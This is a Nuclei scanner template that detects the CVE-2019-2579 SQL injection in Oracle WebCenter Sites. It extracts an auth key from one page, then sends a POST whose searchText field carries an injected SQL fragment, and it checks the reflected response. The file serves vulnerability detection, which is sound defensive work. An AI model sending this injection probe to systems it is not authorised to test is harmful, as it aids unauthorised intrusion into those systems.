id: CVE-2019-2579

info:
  name: Oracle WebCenter Sites - SQL Injection
  author: leovalcante
  severity: medium
  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://github.com/Leovalcante/wcs_scanner
  tags: cve,cve2019,oracle,wcs,sqli
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.30
    cve-id: CVE-2019-2579


requests:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /cs/ContentServer HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+

    cookie-reuse: true
    extractors:
      - type: regex
        name: authkey
        part: body
        internal: true
        group: 1
        regex:
          - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "value='' and '1'='0 --"
          - "Use this utility to view and manage URLs"
        condition: and

      - type: status
        status:
          - 200